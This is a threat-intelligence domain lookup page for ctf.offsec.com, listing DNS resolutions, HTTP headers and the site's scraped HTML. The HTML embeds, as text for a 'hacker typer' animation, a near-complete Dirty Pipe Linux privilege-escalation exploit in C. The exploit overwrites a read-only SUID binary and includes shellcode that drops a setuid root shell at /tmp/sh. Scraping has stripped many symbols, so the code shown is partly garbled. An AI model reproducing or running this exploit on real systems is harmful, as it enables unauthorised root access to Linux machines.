Domain > ctf.offsec.com

Welcome! Right click nodes and scroll the mouse to navigate the graph.

More information on this domain is in AlienVault OTX

DNS Resolutions

Date	IP Address
2023-12-08	104.22.74.103 (ClassC)
2025-01-18	172.67.7.192 (ClassC)

HTTP/1.1 200 OKDate: Sat, 18 Jan 2025 03:40:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveLast-Modified: Thu, 21 Dec 2023 06:03:20 GMTVary: Accept-Encodingcf-cache-status: DYNAMICServer: cloudflareCF-RAY: 903b907fe865ef20-PDX

!DOCTYPE html>html>head>link relstylesheet href1.css>script typetext/javascript srchttps://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js>/script>title>Offsec CTF/title>/head>body>canvas idcanvas width1500 height13500 />script typetext/javascript>/**Based on:https://hackertyper.com/https://github.com/duiker101/Hacker-Typer**/const text  `#define _GNU_SOURCE#include unistd.h>#include fcntl.h>#include stdio.h>#include stdlib.h>#include string.h>#include sys/stat.h>#include sys/user.h>#include stdint.h>#ifndef PAGE_SIZE#define PAGE_SIZE 4096#endif// small (linux x86_64) ELF file matroshka doll that does;//   fd  open(/tmp/sh, O_WRONLY | O_CREAT | O_TRUNC);//   write(fd, elfcode, elfcode_len)//   chmod(/tmp/sh, 04755)//   close(fd);//   exit(0);//// the dropped ELF simply does://   setuid(0);//   setgid(0);//   execve(/bin/sh, /bin/sh, NULL, NULL);unsigned char elfcode  {	/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,	0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,	0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,	0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,	0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,	0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,	0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,	0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,	0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,	0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,	0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,	0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,	0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,	0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,	0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,	0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,	0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,	0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,	0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,	0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,	0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,	0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,	0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,	0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,	0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00};/** * Create a pipe where all bufs on the pipe_inode_info ring have the * PIPE_BUF_FLAG_CAN_MERGE flag set. */static void prepare_pipe(int p2){	if (pipe(p)) abort();	const unsigned pipe_size  fcntl(p1, F_GETPIPE_SZ);	static char buffer4096;	/* fill the pipe completely; each pipe_buffer will now have	   the PIPE_BUF_FLAG_CAN_MERGE flag */	for (unsigned r  pipe_size; r > 0;) {		unsigned n  r > sizeof(buffer) ? sizeof(buffer) : r;		write(p1, buffer, n);		r - n;	}	/* drain the pipe, freeing all pipe_buffer instances (but	   leaving the flags initialized) */	for (unsigned r  pipe_size; r > 0;) {		unsigned n  r > sizeof(buffer) ? sizeof(buffer) : r;		read(p0, buffer, n);		r - n;	}	/* the pipe is now empty, and if somebody adds a new	   pipe_buffer without initializing its flags, the buffer	   will be mergeable */}int hax(char *filename, long offset, uint8_t *data, size_t len) {	/* open the input file and validate the specified offset */	const int fd  open(filename, O_RDONLY); // yes, read-only! :-)	if (fd  0) {		perror(open failed);		return -1;	}	struct stat st;	if (fstat(fd, &st)) {		perror(stat failed);		return -1;	}	/* create the pipe with all flags initialized with	   PIPE_BUF_FLAG_CAN_MERGE */	int p2;	prepare_pipe(p);	/* splice one byte from before the specified offset into the	   pipe; this will add a reference to the page cache, but	   since copy_page_to_iter_pipe() does not initialize the	   flags, PIPE_BUF_FLAG_CAN_MERGE is still set */	--offset;	ssize_t nbytes  splice(fd, &offset, p1, NULL, 1, 0);	if (nbytes  0) {		perror(splice failed);		return -1;	}	if (nbytes  0) {		fprintf(stderr, short splice\n);		return -1;	}	/* the following write will not create a new pipe_buffer, but	   will instead write into the page cache, because of the	   PIPE_BUF_FLAG_CAN_MERGE flag */	nbytes  write(p1, data, len);	if (nbytes  0) {		perror(write failed);		return -1;	}	if ((size_t)nbytes  len) {		fprintf(stderr, short write\n);		return -1;	}	close(fd);	return 0;}int main(int argc, char **argv) {	if (argc ! 2) {		fprintf(stderr, Usage: %s SUID\n, argv0);		return EXIT_FAILURE;	}	char *path  argv1;	uint8_t *data  elfcode;	int fd  open(path, O_RDONLY);	uint8_t *orig_bytes  malloc(sizeof(elfcode));	lseek(fd, 1, SEEK_SET);	read(fd, orig_bytes, sizeof(elfcode));	close(fd);	printf(+ hijacking suid binary..\n);	if (hax(path, 1, elfcode, sizeof(elfcode)) ! 0) {		printf(~ failed\n);		return EXIT_FAILURE;	}	printf(+ dropping suid shell..\n);	system(path);	printf(+ restoring suid binary..\n);	if (hax(path, 1, orig_bytes, sizeof(elfcode)) ! 0) {		printf(~ failed\n);		return EXIT_FAILURE;	}	printf(+ popping root shell.. (dont forget to clean up /tmp/sh ;))\n);	system(/tmp/sh);	return EXIT_SUCCESS;}`;const lines  text.split(\n).filter(line > line.length).map(line > `${line}\n`);;const canvas  document.getElementById(canvas);const ctx  canvas.getContext(2d);const lineHeight  30;const tabWidth  100;function drawText() {    let x  0,        y  0,        lineIndex  0,        charIndex  0;      function animate() {        if (lineIndex > lines.length) {            setTimeout(drawText, 500);            return;        }        const char  lineslineIndexcharIndex; // get the current char to draw        ctx.fillText(char, x, y); // draw the char        if (char  \n) {            y + lineHeight; // add line for new line char        }        // increment x for next char        x + ctx.measureText(char).width;        if (char  \t) {          x + tabWidth;        }        window.scrollTo(0, ((y / canvas.height) * document.body.scrollHeight) - (window.innerHeight / 2));        // if end of line, reset x and move to next line        if (charIndex  lineslineIndex.length - 1) {            x  0;            y + lineHeight;            lineIndex++;            charIndex  0;        } else {            charIndex++;        }        // timeout for the next char        setTimeout(animate, 50);    }    // set up canvas    ctx.clearRect(0, 0, canvas.width, canvas.height);    ctx.font  18px monospace;    ctx.fillStyle  rgb(122, 32, 247);    ctx.textBaseline  top;    animate();}drawText();/script>/body>/html>

View on OTX | View on ThreatMiner

Data with thanks to AlienVault OTX, VirusTotal, Malwr and others. [Sitemap]

Domain > ctf.offsec.com

Is this malicious?

DNS Resolutions

Port 80

Port 443